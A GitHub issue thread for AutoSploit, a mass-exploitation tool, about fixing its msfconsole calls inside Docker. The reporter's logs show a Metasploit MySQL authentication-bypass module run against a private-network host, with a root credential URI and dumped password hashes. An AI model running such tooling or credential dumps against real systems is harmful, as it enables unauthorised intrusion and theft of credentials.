search

NullArray / AutoSploit

Automated Mass Exploiter
GNU General Public License v3.0
5.03k stars 1.13k forks source link

AutoSploit not executing msf commands in docker #1210

Closed scmanjarrez closed 4 years ago

scmanjarrez commented 4 years ago

Running information

- What branch did you download? Master - Clone, or docker run? Docker - What OS are you running? Kali GNU/linux rolling in host, Ubuntu 18.04.3 in docker # Exploit module information

Program information

root@008fc2721648:/opt/metasploit-framework/AutoSploit# python autosploit.py -e -C msf_autorun 10.10.20.3 2424 -f exploits.json

                  . '  .
               ' .( '.) '
       _     ('-.)' (`'.) '
      |0|- -(  #autosploit  )
   .--`+'--.  .  (' -,).(') .
   |`-----'|   (' .) - ('. )
   |       |    . (' `.  )
   |  .-.  |       ` .  `
   | (0.0) |
   | >|=|< |
   |  `"`  |
   |       |
   |       |
   `-.___.-'
   v(4.0)

[+] welcome to autosploit, give us a little bit while we configure
[i] checking your running platform
[i] checking for disabled services
[+] attempting to load API keys
[+] Shodan API token loaded from /opt/metasploit-framework/AutoSploit/etc/tokens/shodan.key
[+] Censys API token loaded from /opt/metasploit-framework/AutoSploit/etc/tokens/censys.key
[i] Loaded 1 exploits from exploits.json.
[+] Launching exploits against 1 hosts:
[+] launching exploit 'auxiliary/scanner/mysql/mysql_authbypass_hashdump' against host '10.10.0.3'
[+] Executing command 'sudo msfconsole -r /root/.autosploit_home/autosploit_out/2019-11-26_16h25m17s/10.10.0.3/auxiliary-scanner-mysql-mysql_authbypass_hashdump -q'

[+] **********RESULTS**********
[+]     1 exploits run against 1 hosts.
[+]     0 exploit successful (Check report.csv to validate!).
[+]     0 exploit failed.
[+]     Exploit run saved to /root/.autosploit_home/autosploit_out/2019-11-26_16h25m17s
[+]     Report saved to /root/.autosploit_home/autosploit_out/2019-11-26_16h25m17s/report.csv

I have run AutoSploit in docker and it isn't working correctly. You can see that exploiter.py is executing the command "sudo msfconsole ...". In the docker machine there is no "sudo", so it fails the execution, then, "msfconsole" is not in PATH so it won't work either. After removal of "sudo"

sed -i 's/sudo //g' lib/exploitation/exploiter.py

and addition of msfconsole to path (or using --msf-path), it works flawlessly

export PATH=$PATH:/opt/metasploit-framework

root@008fc2721648:/opt/metasploit-framework/AutoSploit# python autosploit.py -e -C msf_autorun 10.10.20.3 2424 -f exploits.json

                  . '  .
               ' .( '.) '
       _     ('-.)' (`'.) '
      |0|- -(  #autosploit  )
   .--`+'--.  .  (' -,).(') .
   |`-----'|   (' .) - ('. )
   |       |    . (' `.  )
   |  .-.  |       ` .  `
   | (0.0) |
   | >|=|< |
   |  `"`  |
   |       |
   |       |
   `-.___.-'
   v(4.0)

[+] welcome to autosploit, give us a little bit while we configure
[i] checking your running platform
[i] checking for disabled services
[+] attempting to load API keys
[+] Shodan API token loaded from /opt/metasploit-framework/AutoSploit/etc/tokens/shodan.key
[+] Censys API token loaded from /opt/metasploit-framework/AutoSploit/etc/tokens/censys.key
[i] Loaded 1 exploits from exploits.json.
[+] Launching exploits against 1 hosts:
[+] launching exploit 'auxiliary/scanner/mysql/mysql_authbypass_hashdump' against host '10.10.0.3'
[+] Executing command 'msfconsole -r /root/.autosploit_home/autosploit_out/2019-11-26_16h16m57s/10.10.0.3/auxiliary-scanner-mysql-mysql_authbypass_hashdump -q'
(msf)>> [*] Processing /root/.autosploit_home/autosploit_out/2019-11-26_16h16m57s/10.10.0.3/auxiliary-scanner-mysql-mysql_authbypass_hashdump for ERB directives.
(msf)>> resource (/root/.autosploit_home/autosploit_out/2019-11-26_16h16m57s/10.10.0.3/auxiliary-scanner-mysql-mysql_authbypass_hashdump)> workspace -a msf_autorun
(msf)>> [*] Added workspace: msf_autorun
(msf)>> resource (/root/.autosploit_home/autosploit_out/2019-11-26_16h16m57s/10.10.0.3/auxiliary-scanner-mysql-mysql_authbypass_hashdump)> use auxiliary/scanner/mysql/mysql_authbypass_hashdump
(msf)>> resource (/root/.autosploit_home/autosploit_out/2019-11-26_16h16m57s/10.10.0.3/auxiliary-scanner-mysql-mysql_authbypass_hashdump)> setg lhost 10.10.20.3
(msf)>> lhost => 10.10.20.3
(msf)>> resource (/root/.autosploit_home/autosploit_out/2019-11-26_16h16m57s/10.10.0.3/auxiliary-scanner-mysql-mysql_authbypass_hashdump)> setg lport 2424
(msf)>> lport => 2424
(msf)>> resource (/root/.autosploit_home/autosploit_out/2019-11-26_16h16m57s/10.10.0.3/auxiliary-scanner-mysql-mysql_authbypass_hashdump)> setg verbose true
(msf)>> verbose => true
(msf)>> resource (/root/.autosploit_home/autosploit_out/2019-11-26_16h16m57s/10.10.0.3/auxiliary-scanner-mysql-mysql_authbypass_hashdump)> setg threads 20
(msf)>> threads => 20
(msf)>> resource (/root/.autosploit_home/autosploit_out/2019-11-26_16h16m57s/10.10.0.3/auxiliary-scanner-mysql-mysql_authbypass_hashdump)> set rhost 10.10.0.3
(msf)>> [!] RHOST is not a valid option for this module. Did you mean RHOSTS?
(msf)>> rhost => 10.10.0.3
(msf)>> resource (/root/.autosploit_home/autosploit_out/2019-11-26_16h16m57s/10.10.0.3/auxiliary-scanner-mysql-mysql_authbypass_hashdump)> set rhosts 10.10.0.3
(msf)>> rhosts => 10.10.0.3
(msf)>> resource (/root/.autosploit_home/autosploit_out/2019-11-26_16h16m57s/10.10.0.3/auxiliary-scanner-mysql-mysql_authbypass_hashdump)> run -z
(msf)>> [+] 10.10.0.3:3306        - 10.10.0.3:3306 The server allows logins, proceeding with bypass test
(msf)>> [*] 10.10.0.3:3306        - 10.10.0.3:3306 Authentication bypass is 10% complete
(msf)>> [*] 10.10.0.3:3306        - 10.10.0.3:3306 Authentication bypass is 20% complete
(msf)>> [*] 10.10.0.3:3306        - 10.10.0.3:3306 Authentication bypass is 30% complete
(msf)>> [*] 10.10.0.3:3306        - 10.10.0.3:3306 Authentication bypass is 40% complete
(msf)>> [*] 10.10.0.3:3306        - 10.10.0.3:3306 Authentication bypass is 50% complete
(msf)>> [+] 10.10.0.3:3306        - 10.10.0.3:3306 Successfully bypassed authentication after 588 attempts. URI: mysql://root:lpOAyKt@10.10.0.3:3306
(msf)>> [+] 10.10.0.3:3306        - 10.10.0.3:3306 Successfully exploited the authentication bypass flaw, dumping hashes...
(msf)>> [+] 10.10.0.3:3306        - 10.10.0.3:3306 Saving HashString as Loot: root:*6BB4837EB74329105EE4568DDA7DC67ED2CA2AD9
(msf)>> [+] 10.10.0.3:3306        - 10.10.0.3:3306 Saving HashString as Loot: root:*6BB4837EB74329105EE4568DDA7DC67ED2CA2AD9
(msf)>> [+] 10.10.0.3:3306        - 10.10.0.3:3306 Saving HashString as Loot: root:*6BB4837EB74329105EE4568DDA7DC67ED2CA2AD9
(msf)>> [+] 10.10.0.3:3306        - 10.10.0.3:3306 Saving HashString as Loot: root:*6BB4837EB74329105EE4568DDA7DC67ED2CA2AD9
(msf)>> [+] 10.10.0.3:3306        - 10.10.0.3:3306 Saving HashString as Loot: root:*6BB4837EB74329105EE4568DDA7DC67ED2CA2AD9
(msf)>> [+] 10.10.0.3:3306        - 10.10.0.3:3306 Hash Table has been saved: /root/.msf4/loot/20191126161722_msf_autorun_10.10.0.3_mysql.hashes_300774.txt
(msf)>> [*] Scanned 1 of 1 hosts (100% complete)
(msf)>> [*] Auxiliary module execution completed
(msf)>> resource (/root/.autosploit_home/autosploit_out/2019-11-26_16h16m57s/10.10.0.3/auxiliary-scanner-mysql-mysql_authbypass_hashdump)> exit -y
(msf)>> 

[+] **********RESULTS**********
[+]     1 exploits run against 1 hosts.
[+]     1 exploit successful (Check report.csv to validate!).
[+]     0 exploit failed.
[+]     Exploit run saved to /root/.autosploit_home/autosploit_out/2019-11-26_16h16m57s
[+]     Report saved to /root/.autosploit_home/autosploit_out/2019-11-26_16h16m57s/report.csv

Meanwhile, I'm adding these workarounds to my entrypoint.sh.

Ekultek commented 4 years ago

Are you saying that you have msf inside of a docker container and want to execute the commands in the container, or that the docker image with AS is bad?

Ekultek commented 4 years ago

@NullArray we could just add a --docker flag and if it's passed don't use the sudo keyword when executing the command. We could also check if the user is inside a docker container before executing just in case and if we determine they are we can either disallow them execution or automatically associate the flag as True. What do you think?

scmanjarrez commented 4 years ago

Are you saying that you have msf inside of a docker container and want to execute the commands in the container, or that the docker image with AS is bad?

Correct, I'm trying to execute AutoSploit from a container without user input, using -e and -f arguments.

Ekultek commented 4 years ago

@scmanjarrez what do you think of the docker flag idea above? Or do you think it would work better to detect if the user is inside a docker container and go from there?

scmanjarrez commented 4 years ago

@scmanjarrez what do you think of the docker flag idea above? Or do you think it would work better to detect if the user is inside a docker container and go from there?

it's ok for me to use the --docker flag, right now I'm detecting if autosploit is running inside a docker container, but it would be better to make it general so it'll work regardless the container tool.

Ekultek commented 4 years ago

it's ok for me to use the --docker flag, right now I'm detecting if autosploit is running inside a docker container, but it would be better to make it general so it'll work regardless the container tool.

Alright I’ll create a way to determine if we’re inside a rocker container, that should make it more portable instead of creating a flag that will have to be passed.

Basically what I’ll do is just check if we’re inside a container, if we are, I’ll get it to run without sudo. It’ll be up to you to pass the path though (if needed)

Ekultek commented 4 years ago

fixed via https://github.com/NullArray/AutoSploit/commit/03020fd08bf6869ee240cf5d7d3499cd03452846 look for it in the next merge